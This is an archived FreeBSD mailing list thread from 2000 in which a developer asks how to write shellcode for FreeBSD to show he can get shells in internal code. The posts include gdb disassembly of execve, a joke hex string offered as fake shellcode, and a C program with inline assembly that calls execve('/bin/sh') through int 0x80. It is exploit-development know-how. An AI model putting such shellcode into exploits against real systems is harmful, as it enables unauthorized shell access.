Re: Shell Code... (fwd)

2000-02-28 Thread Michael Kyle 


Doug suggested that I send a message similar to this to
the group, instead of my original.  So, here is what I'd
re'd to Doug.

Information or other approaches is appreciated.

Mike.
Yahoo!


-- Forwarded message --
Date: Thu, 24 Feb 2000 21:39:26 -0800 (PST)
From: Michael Kyle <[EMAIL PROTECTED]>
To: Doug White <[EMAIL PROTECTED]>
Subject: Re: Shell Code...


Doug,

You've been a freeBSD advocate for a quite a while, I'm new to
the OS and new to Yahoo.  I'm sure you know that Yahoo is a 
freeBSD org.  I really do need help whacking some of our development
stuff.  One of the things I am trying to do is demonstrate that
I can obtain shells on some of our interally used code, in specific
instances.  While I have never had a problem deriving my own shell code on
solaris, irix or linux,  for some reason, everything I do on freebsd
fails.

Do you happen to know where the execve (syscall index 59) snaggs its
params?  Clearly a gdb dump of the assembler of a simple prog that does
nothing more than call execve passing /bin/sh shows the following

(gdb) disas main
Dump of assembler code for function main:
0x804814c :   pushl  %ebp
0x804814d : movl   %esp,%ebp# prolog stuff here
0x804814f : subl   $0x8,%esp# variables
0x8048152 : movl   $0x804833d,0xfff8(%ebp)  # /bin/sh
0x8048159 :movl   $0x0,0xfffc(%ebp) 
0x8048160 :pushl  $0x0  # param 2 to execve
0x8048162 :leal   0xfff8(%ebp),%eax
0x8048165 :pushl  %eax  # param 1
0x8048166 :movl   0xfff8(%ebp),%eax
0x8048169 :pushl  %eax  # param 0
0x804816a :call   0x80481e8 # the call
0x804816f :addl   $0xc,%esp
0x8048172 :leave
0x8048173 :ret  


and 

(gdb) disas execve
Dump of assembler code for function execve:
0x80481e8 : leal   0x3b,%eax   # syscall index
0x80481ee :   int$0x80   # kernel call-- must know
   # where to find params
0x80481f0 :   jb 0x80481e0  # a jump
0x80481f2 :  ret
0x80481f3 :  nop
End of assembler dump. 


and for the jb, 

(gdb) disas 0x80481e0

0x80481e0 : jmp0x8048307 <.cerror>  
0x80481e5 : leal   0x0(%esi),%esi  



Clearly, a kernel call is performed (index 0x3b) with the
passed info on the stack and as an offset to the frame pointer
in main.  I've tried referencing the values on the stack and
seem to screw it up.

Any suggestions?  What you sent me. do I need to 
expand?

Mike.



On Thu, 24 Feb 2000, Doug White wrote:

> On Thu, 24 Feb 2000, Michael Kyle wrote:
> 
> > 
> > Hi does anyone have shellcode for freebsd.  If not, 
> > I'll disassemble execve, but I'd rather just pick
> > it up from the group.
> 
> Yeah, the shellcode is
> 
> 
>0xb238fb23b238gub2348b223bdfz23a89230934897a324987287bd8970d8997893981deadbeef21398778787aaa9797bb8979878d87f87
> 
> Doug White|  FreeBSD: The Power to Serve
> [EMAIL PROTECTED] |  www.FreeBSD.org
> 
> 
> 
> To Unsubscribe: send mail to [EMAIL PROTECTED]
> with "unsubscribe freebsd-hackers" in the body of the message
> 
> 




To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-hackers" in the body of the message

RE: Shell Code... (fwd)

2000-03-02 Thread Yevmenkin, Maksim N, CSCIO 

hello all,

in case if still need it :)

here is good skeleton for shell code :-) i DO NOT want to put 
REAL shell code here. just do ``x/32bx main'' and you will
see what you want. :)

i'm too lazy to write in assebmler and hate AT&T syntax :)

<-- cut here ->

char*cmd = "/bin/sh";
char*arg[] = { "sh", 0 };

void
main(void)
{
/* execve(cmd, argv, env) */

/* pass ``env'' == NULL */
__asm__("xorl   %eax,%eax\n");
__asm__("push   %eax");

/* pass ``argv[]'' */
__asm__("push   $arg\n");

/* pass ``cmd'' */
__asm__("movl   $cmd,%edx\n");
__asm__("movl   (%edx),%eax\n");
__asm__("push   %eax\n");

/* simulate ``libc call '' */
__asm__("push   %ecx\n");

/* system call */
__asm__("xorl   %eax,%eax\n");
__asm__("movb   $0x3b,%al\n");
__asm__("int$0x80\n");
}


<- end cut -->

thanks
emax


To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-hackers" in the body of the message